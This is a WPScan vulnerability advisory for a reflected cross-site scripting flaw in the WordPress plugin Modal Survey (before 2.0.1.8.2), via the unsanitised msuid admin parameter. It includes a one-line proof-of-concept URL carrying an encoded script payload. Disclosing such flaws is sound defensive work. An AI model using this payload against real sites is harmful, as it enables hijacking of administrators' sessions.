WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Modal Survey < 2.0.1.8.2 - Authenticated Reflected Cross-Site Scripting (XSS)

Description

The plugin did not sanitise the msuid parameter from the survey participants page in the admin Dashboard, leading to a reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/admin.php?page=modal_survey_participants&msuid=%27%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E

Affects Plugins

modal_survey
Fixed in version 2.0.1.8.2

References

URL
http://modalsurvey.pantherius.com/documentation/#line14

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Pagely

Submitter

John Castro

Submitter website
https://pagely.com/
Submitter twitter
pagely
Verified

No

WPVDB ID
1c21cf4e-d196-4edf-946e-70b78beaea01

Timeline

Publicly Published

2021-01-08 (about 2 years ago)

Added

2021-01-08 (about 2 years ago)

Last Updated

2021-01-09 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin